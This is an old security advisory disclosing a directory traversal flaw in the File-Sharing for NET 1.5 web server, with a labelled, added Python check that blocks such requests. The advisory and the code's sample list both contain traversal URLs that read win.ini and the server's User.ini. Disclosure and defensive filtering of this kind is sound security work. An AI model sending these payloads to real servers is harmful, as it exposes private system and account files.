Minihttpserver File-Sharing for NET Directory Traversal Vulnerability




Affected Systems: File-Sharing for NET
Version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003





Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."

- Vendor's Description
   [ http://www.minihttpserver.net ]





Details:
========
File-Sharing for NET has a directory traversal vulnerability. Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.

http://[target]/../../../existing_file

http://[target]\..\..\..\existing_file



Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini

http://127.0.0.1/../../../windows/win.ini
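
The server-side check that refuses both request forms shown above, as an added example (not code from this advisory or from the vendor). It goes slightly beyond the advisory by also decoding percent-escapes and rejecting drive letters; DOC_ROOT, the function names and the sample requests are constructed for illustration.

```python
import os
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a request path would leave the published directory."""


def resolve_request_path(doc_root, request_path):
    """Return the absolute file path for request_path, confined to doc_root."""
    root = os.path.realpath(doc_root)
    # Decode percent-escapes first so %2e%2e%5c is seen as '..\' before checking.
    decoded = unquote(request_path.split("?", 1)[0])
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    # Treat '\' as a separator on every platform; the advisory shows both forms.
    parts = decoded.replace("\\", "/").split("/")
    segments = [p for p in parts if p not in ("", ".")]
    for seg in segments:
        # ':' blocks drive letters (C:) and NTFS alternate data streams.
        if seg == ".." or ":" in seg:
            raise TraversalError("illegal path segment: %r" % seg)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Defence in depth: a symlink inside the root must not lead outside it.
    if os.path.commonpath([root, candidate]) != root:
        raise TraversalError("resolved path escapes document root")
    return candidate


def is_blocked(doc_root, request_path):
    """True when the request is refused, False when it maps inside doc_root."""
    try:
        resolve_request_path(doc_root, request_path)
    except TraversalError:
        return True
    return False


# Constructed sample requests modelled on the URL patterns in the advisory.
DOC_ROOT = "/srv/share"  # hypothetical published directory (assumption)
SAMPLES = [
    "/docs/report.txt",
    "/../../../windows/win.ini",
    "\\..\\..\\..\\windows\\win.ini",
    "/%2e%2e/%2e%2e%5cwindows/win.ini",
]

if __name__ == "__main__":
    for path in SAMPLES:
        print("BLOCK" if is_blocked(DOC_ROOT, path) else "ALLOW", path)
```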





Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:

http://www.minihttpserver.net/fbbs.zip





Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@hotmail.com
http://www.bsecurity.tk
